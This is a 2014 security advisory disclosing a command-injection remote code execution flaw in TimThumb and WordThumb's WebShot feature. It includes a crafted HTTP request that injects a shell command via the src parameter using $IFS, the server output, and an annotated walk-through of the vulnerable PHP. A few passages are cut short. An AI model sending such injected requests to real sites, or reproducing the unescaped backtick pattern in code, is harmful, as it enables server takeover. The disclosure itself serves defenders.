#TimThumb 2.8.13 with #WebShot enabled suffers from a Remote Code Execution #vulnerability

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# Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)
# Affected website : a lot Wordpress Themes, Plugins, 3rd party components
# Exploit Author : @u0x (Pichaya Morimoto)
# Release dates : June 24, 2014
# Special Thanks to 2600 Thailand group
# : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/

[+] Description
TimThumb is a small php script for cropping, zooming and resizing web
images (jpg, png, gif). Perfect for use on blogs and other applications.
Developed for use in the WordPress theme Mimbo Pro, and since used in many
other WordPress themes.


The original project WordThumb 1.07 also vulnerable (
They both shared exactly the same WebShot code! And there are several
projects that shipped with "timthumb.php", such as,
Wordpress Gallery Plugin
IGIT Posts Slider Widget

All themes from http://themify.me/ contains vulnerable "wordthumb" in

[+] Exploit

** Note that OS commands payload MUST be within following character sets:

** Spaces, Pipe, GT sign are not allowed.
** This WebShot feature is DISABLED by default.
** CutyCapt and XVFB must be installed in constants.

[+] Proof-of-Concept
There are couple techniques that can be used to bypass limited charsets but
I will use a shell variable $IFS insteads of space in this scenario.

PoC Environment:
Ubuntu 14.04 LTS
PHP 5.5.9
Wordpress 3.9.1
Themify Parallax Theme 1.5.2
WordThumb 1.07

Crafted Exploit:

GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=
http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1
Host: longcatlab.local
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/35.0.1916.153 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: woocommerce_recently_viewed=9%7C12%7C16;
wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot;

HTTP/1.1 400 Bad Request
Date: Tue, 24 Jun 2014 07:20:48 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 3059
Connection: close
Content-Type: text/html

( )

A WordThumb error has occured

The following error(s) occured:
  • The image being resized is not a valid gif, jpg or png.

Query String : webshot=1&src= http://longcatlab.local/$(touch$IFS/tmp/longcat)
WordThumb version : 1.07 Even it response with error messages but injected OS command has already been executed. $ ls /tmp/longcat -lha - -rw-r--r-- 1 www-data www-data 0 มิ.ย. 24 14:20 /tmp/longcat [+] Vulnerability Analysis ============================================================ https://timthumb.googlecode.com/svn/trunk/timthumb.php Filename: timthumb.php if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true); if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT', '/usr/local/bin/CutyCapt'); if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run'); ... timthumb::start(); ← start script ... public static function start(){ $tim = new timthumb(); ← create timthumb object, call __construct() ... $tim->run(); ... public function __construct(){ ... $this->src = $this->param('src'); ← set "src" variable to HTTP GET "src" parameter … if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){ ... $this->isURL = true; ← prefix http/s result in isURL = true } ... protected function param($property, $default = ''){ if (isset ($_GET[$property])) { return $_GET[$property]; ... public function run(){ if($this->isURL){ ... if($this->param('webshot')){ ← HTTP GET "webshot" must submitted if(WEBSHOT_ENABLED){ ← this pre-defined constant must be true ... $this->serveWebshot(); ← call webshot feature } else { ... protected function serveWebshot(){ ... if(! is_file(WEBSHOT_CUTYCAPT)){ ← check existing of cutycapt return $this->error("CutyCapt is not installed. $instr"); } if(! is_file(WEBSHOT_XVFB)){ ← check existing of xvfb return $this->Error("Xvfb is not installed. $instr"); } ... $url = $this->src; if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ← check valid URL #LoL return $this->error("Invalid URL supplied."); } $url = preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/', '', $url); ← check valid URL as specified in RFC 3986 http://www.ietf.org/rfc/rfc3986.txt ... if(WEBSHOT_XVFB_RUNNING){ putenv('DISPLAY=:100.0'); $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ← OS shell command injection } else { $command = "$xv --server-args=\"-screen 0, {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ← OS shell command injection } ... $out = `$command`; ← execute $command as shell command "PHP supports one execution operator: backticks (``). Note that these are not single-quotes! PHP will attempt to execute the contents of the backticks as a shell command." - http://www.php.net//manual/en/language.operators.execution.php "$url" is failed to escape "$()" in "$command" which is result in arbitrary code execution. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJTqTTsAAoJEB2kHapd1XMUy+cP/2ulCS1R8bXDda7R0PIfn9g9 FEECoLFV2tav1mSnWzuccvWA3vl3g8SUv/Y7GCKs824GVauhcestUUCpVKdCS3Gu 8ypfXOdecE+8ykoPhWfj2FWcKNpXTdCoMz8TugVkNM3+SS0akWYWqHeamXCqc3SK ZAiKfYQZ/jvVRRo8n/AAWYv5e8hZLmE6qiLGdTFrsH7VtkABIM5lc88o8qg6RU5x zg87khZxU+HtJdzN/gH0X6DL7+NJe6HOqun/+V8pm/5JEDUSpiWZIM1xpyIY6GqW UnU25UkSt1u+PnLX7KhqxUANU230BY9Ny7BIhp/q1iRvrKTIHK0WYEL3M96YOND2 +o2YJthfL7zm9k8XMoF2GQaaeqAnWjGmQC9Oo4ogF57X0Qzb1mwUd01db/R5fgPf 9IILnpWV2KLq57R3sdVesriEhTNW34Cqf77wS3P5Y5o2csbFL0OspulOVPM1uJTp S1sjuEL5gK3nJqzo7K2ihxdmm3o2hA9QXyn8GjTRu6ESZ26hSZgUEyC6P26yAt0Y IHuqML3y9guC720BkNoc1gZZNejgqGHUdc6EXzqO9njZFx5DPtDtf3M0f6uZfH/C knB9E32Lo9EFu2S/bjblgOQQUPNtKRNURpsGArx2eilPMdThGLZANFPIzvxYSlrz cnw4vN4tY8POL5FF7+gF =jAL1 -----END PGP SIGNATURE-----
